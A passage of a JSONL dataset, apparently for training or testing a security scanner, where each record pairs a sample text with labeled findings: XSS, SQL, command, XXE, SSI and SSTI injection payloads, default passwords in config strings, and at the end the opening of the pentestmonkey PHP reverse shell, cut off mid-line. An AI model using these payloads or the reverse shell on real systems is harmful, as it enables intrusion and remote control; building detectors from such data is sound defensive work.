"malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01413", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<content onmouseleave=\"alert(1)\">test</content>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<content onmouseleave=\"alert(1)\">test</content>", "injection_type": "XSS"}}]} {"id": "seclists_01414", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<multicol onbeforecut=\"alert(1)\" contenteditable>test</multicol> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<multicol onbeforecut=\"alert(1)\" contenteditable>test</multicol>", "injection_type": "XSS"}}]} {"id": "seclists_01415", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<s id=x tabindex=1 onactivate=alert(1)></s>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<s id=x tabindex=1 onactivate=alert(1)></s>", "injection_type": "XSS"}}]} {"id": "seclists_01416", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem>", "injection_type": "XSS"}}]} {"id": "seclists_01417", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:menthol@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "menthol"}}]} {"id": "seclists_01418", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:pregnant@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pregnant"}}]} {"id": "seclists_01419", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <IMG%20SRC='javasc\tript:alert(document.cookie)'>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG%20SRC='javasc\tript:alert(document.cookie)'>", "injection_type": "cmd"}}]} {"id": "seclists_01420", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_01421", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ; exec master..xp_cmdshell 'ping 172.10.1.255'--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "; exec master..xp_cmdshell 'ping 172.10.1.255'--", "injection_type": "SQL"}}]} {"id": "seclists_01422", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit String: <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>", "injection_type": "XSS"}}]} {"id": "seclists_01423", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<html onbeforecopy=\"alert(1)\" contenteditable>test</html> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<html onbeforecopy=\"alert(1)\" contenteditable>test</html>", "injection_type": "XSS"}}]} {"id": "seclists_01424", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%00 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%00", "injection_type": "cmd"}}]} {"id": "seclists_01425", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<option draggable=\"true\" ondragleave=\"alert(1)\">test</option>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<option draggable=\"true\" ondragleave=\"alert(1)\">test</option>", "injection_type": "XSS"}}]} {"id": "seclists_01426", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ${shell_exec(print(`echo%20SICOKB`.`echo%20$((59%2B30))`.`echo%20SICOKB`.`echo%20SICOKB`)%3B%23SICOKB", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${shell_exec(print(`echo%20SICOKB`.`echo%20$((59%2B30))`.`echo%20SICOKB`.`echo%20SICOKB`)%3B%23SICOKB", "injection_type": "cmd"}}]} {"id": "seclists_01427", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20SPZWVR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26", "injection_type": "cmd"}}]} {"id": "seclists_01428", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Obfuscated double-body onload vector</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Obfuscated double-body onload vector", "injection_type": "XSS"}}]} {"id": "seclists_01429", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20TIKHVB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_01430", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0aecho%20VXXNDX$((4%2B53))$(echo%20VXXNDX)VXXNDX%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20VXXNDX$((4%2B53))$(echo%20VXXNDX)VXXNDX%7C", "injection_type": "cmd"}}]} {"id": "seclists_01431", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '1;(load_file(char(47,101,116,99,47,112,97,115, ...';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1;(load_file(char(47,101,116,99,47,112,97,115, ...", "injection_type": "SQL"}}]} {"id": "seclists_01432", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, internet explorer, concatenated, obfuscated HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, internet explorer, concatenated, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_01433", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01434", "source": "seclists", "source_license": "MIT", "text": "password: Arun,123,234,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Arun,123,234,"}}]} {"id": "seclists_01435", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><abbr onmouseleave=\"alert(1)\">test</abbr></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<abbr onmouseleave=\"alert(1)\">test</abbr>", "injection_type": "XSS"}}]} {"id": "seclists_01436", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=punk\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "punk"}}]} {"id": "seclists_01437", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x oncopy=alert(1)>copy this!</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x oncopy=alert(1)>copy this!", "injection_type": "XSS"}}]} {"id": "seclists_01438", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><param oncut=\"alert(1)\" contenteditable>test</param></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<param oncut=\"alert(1)\" contenteditable>test</param>", "injection_type": "XSS"}}]} {"id": "seclists_01439", "source": "seclists", "source_license": "MIT", "text": "filename='%26echo$IFSZJHAFI$((51%2B78))$(echo$IFSZJHAFI)ZJHAFI//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%26echo$IFSZJHAFI$((51%2B78))$(echo$IFSZJHAFI)ZJHAFI//", "injection_type": "cmd"}}]} {"id": "seclists_01440", "source": "seclists", "source_license": "MIT", "text": "filename=%26echo$IFSTZBZPJ$((19%2B93))$(echo$IFSTZBZPJ)TZBZPJ\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26echo$IFSTZBZPJ$((19%2B93))$(echo$IFSTZBZPJ)TZBZPJ\\", "injection_type": "cmd"}}]} {"id": "seclists_01441", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<rp onmouseover=\"alert(1)\">test</rp>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rp onmouseover=\"alert(1)\">test</rp>", "injection_type": "XSS"}}]} {"id": "seclists_01442", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<!DOCTYPE xxe [ <!ENTITY % file SYSTEM \"file:///c:/boot.ini\"><!ENTITY % dtd SYSTEM \"http://example.com/evil.dtd\">%dtd;%trick;]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE xxe [ <!ENTITY % file SYSTEM \"file:///c:/boot.ini\"><!ENTITY % dtd SYSTEM \"http://example.com/evil.dtd\">%dtd;%trick;]>", "injection_type": "XXE"}}]} {"id": "seclists_01443", "source": "seclists", "source_license": "MIT", "text": "username=\") or (\"x\")=(\"x&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\") or (\"x\")=(\"x", "injection_type": "SQL"}}]} {"id": "seclists_01444", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=' UNION SELECT HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' UNION SELECT", "injection_type": "SQL"}}]} {"id": "seclists_01445", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: STYLE w/background-image</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: STYLE w/background-image", "injection_type": "XSS"}}]} {"id": "seclists_01446", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=AMI,<BLANK>,AMI_SW,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AMI,<BLANK>,AMI_SW,"}}]} {"id": "seclists_01447", "source": "seclists", "source_license": "MIT", "text": "password: Nortel,<BLANK>,l1,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Nortel,<BLANK>,l1,"}}]} {"id": "seclists_01448", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<svg><bgsound onload=alert(1)></bgsound> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><bgsound onload=alert(1)></bgsound>", "injection_type": "XSS"}}]} {"id": "seclists_01449", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Oracle,MMO2,MMO2,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,MMO2,MMO2,"}}]} {"id": "seclists_01450", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: PHPIDS Group\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: PHPIDS Group", "injection_type": "XSS"}}]} {"id": "seclists_01451", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: */*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*/*", "injection_type": "cmd"}}]} {"id": "seclists_01452", "source": "seclists", "source_license": "MIT", "text": "filename=%26%26echo%20OCTJGM$((17%2B59))$(echo%20OCTJGM)OCTJGM\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%26echo%20OCTJGM$((17%2B59))$(echo%20OCTJGM)OCTJGM\\", "injection_type": "cmd"}}]} {"id": "seclists_01453", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_connection\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_connection\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01454", "source": "seclists", "source_license": "MIT", "text": "filename=&&echo$IFSSUKTVK$((49%2B30))$(echo$IFSSUKTVK)SUKTVK", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&&echo$IFSSUKTVK$((49%2B30))$(echo$IFSSUKTVK)SUKTVK", "injection_type": "cmd"}}]} {"id": "seclists_01455", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%20%5B%206%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%206%20-ne%20%24%28echo%20ZNVKIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22", "injection_type": "cmd"}}]} {"id": "seclists_01456", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%", "injection_type": "cmd"}}]} {"id": "seclists_01457", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%20echo%20WWHRDZ$((5%2B86))$(echo%20WWHRDZ)WWHRDZ//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20echo%20WWHRDZ$((5%2B86))$(echo%20WWHRDZ)WWHRDZ//", "injection_type": "cmd"}}]} {"id": "seclists_01458", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\u003c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\u003c", "injection_type": "cmd"}}]} {"id": "seclists_01459", "source": "seclists", "source_license": "MIT", "text": "filename=\"||echo%20RJZLGG$((1%2B14))$(echo%20RJZLGG)RJZLGG%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"||echo%20RJZLGG$((1%2B14))$(echo%20RJZLGG)RJZLGG%22", "injection_type": "cmd"}}]} {"id": "seclists_01460", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 1=1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1", "injection_type": "SQL"}}]} {"id": "seclists_01461", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\" -- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" --", "injection_type": "SQL"}}]} {"id": "seclists_01462", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x%09onxxx=1\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x%09onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_01463", "source": "seclists", "source_license": "MIT", "text": "filename=%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01464", "source": "seclists", "source_license": "MIT", "text": "username=or pg_sleep(__TIME__)--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_01465", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"remote_addr\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"remote_addr\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01466", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=skinner\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "skinner"}}]} {"id": "seclists_01467", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: STYLE tag using background-image.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: STYLE tag using background-image.", "injection_type": "XSS"}}]} {"id": "seclists_01468", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22%7C%20%5B%203%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%203%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_01469", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \u0018 or 3=3 --", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\u0018 or 3=3 --", "injection_type": "SQL"}}]} {"id": "seclists_01470", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=acidburn\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "acidburn"}}]} {"id": "seclists_01471", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\x27\\x6F\\x72 SELECT *", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x27\\x6F\\x72 SELECT *", "injection_type": "cmd"}}]} {"id": "seclists_01472", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: IE backticked semicolon injection</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: IE backticked semicolon injection", "injection_type": "XSS"}}]} {"id": "seclists_01473", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, obfuscated, SSI, injection\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, SSI, injection", "injection_type": "XSS"}}]} {"id": "seclists_01474", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: ha.ckers.org HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01475", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: XML (locally hosted)</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: XML (locally hosted)", "injection_type": "XSS"}}]} {"id": "seclists_01476", "source": "seclists", "source_license": "MIT", "text": "username=\" or \"\"&\"&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"\"&\"", "injection_type": "SQL"}}]} {"id": "seclists_01477", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><br><br><br><br><br><br><br><br><br><br></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<br><br><br><br><br><br><br><br><br><br>", "injection_type": "XSS"}}]} {"id": "seclists_01478", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CQWURN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23", "injection_type": "cmd"}}]} {"id": "seclists_01479", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<cite onbeforepaste=\"alert(1)\" contenteditable>test</cite>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<cite onbeforepaste=\"alert(1)\" contenteditable>test</cite>", "injection_type": "XSS"}}]} {"id": "seclists_01480", "source": "seclists", "source_license": "MIT", "text": "username=1)) or benchmark(10000000,MD5(1))#&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1)) or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_01481", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=hawaii50\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "hawaii50"}}]} {"id": "seclists_01482", "source": "seclists", "source_license": "MIT", "text": "username=or 0=0 --&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 0=0 --", "injection_type": "SQL"}}]} {"id": "seclists_01483", "source": "seclists", "source_license": "MIT", "text": "password: gangbanged\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "gangbanged"}}]} {"id": "seclists_01484", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=bailey\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "bailey"}}]} {"id": "seclists_01485", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=aladin\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "aladin"}}]} {"id": "seclists_01486", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>:target {transform: rotate(180deg);}</style><rtc id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></rtc>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><rtc id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></rtc>", "injection_type": "XSS"}}]} {"id": "seclists_01487", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello $smarty.version</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "$smarty.version", "injection_type": "SSTI"}}]} {"id": "seclists_01488", "source": "seclists", "source_license": "MIT", "text": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n//\n// This tool may be used for legal purposes only. Users take full responsibility\n// for any actions performed using this tool. The author accepts no liability\n// for damage caused by this tool. If these terms are not acceptable to you, then\n// do not use this tool.\n//\n// In all other respects the GPL version 2 applies:\n//\n// This program is free software; you can redistribute it and/or modify\n// it under the terms of the GNU General Public License version 2 as\n// published by the Free Software Foundation.\n//\n// This program is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License along\n// with this program; if not, write to the Free Software Foundation, Inc.,\n// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n//\n// This tool may be used for legal purposes only. Users take full responsibility\n// for any actions performed using this tool. If these terms are not acceptable to\n// you, then do not use this tool.\n//\n// You are encouraged to send comments, improvements or suggestions to\n// me at pentestmonkey@pentestmonkey.net\n//\n// Description\n// -----------\n// This script will make an outbound TCP connection to a hardcoded IP and port.\n// The recipient will be given a shell running as the current user (apache normally).\n//\n// Limitations\n// -----------\n// proc_open and stream_set_blocking require PHP version 4.3+, or 5+\n// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\n// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.\n//\n// Usage\n// -----\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = isset($_POST['ip']) ? $_POST['ip'] : 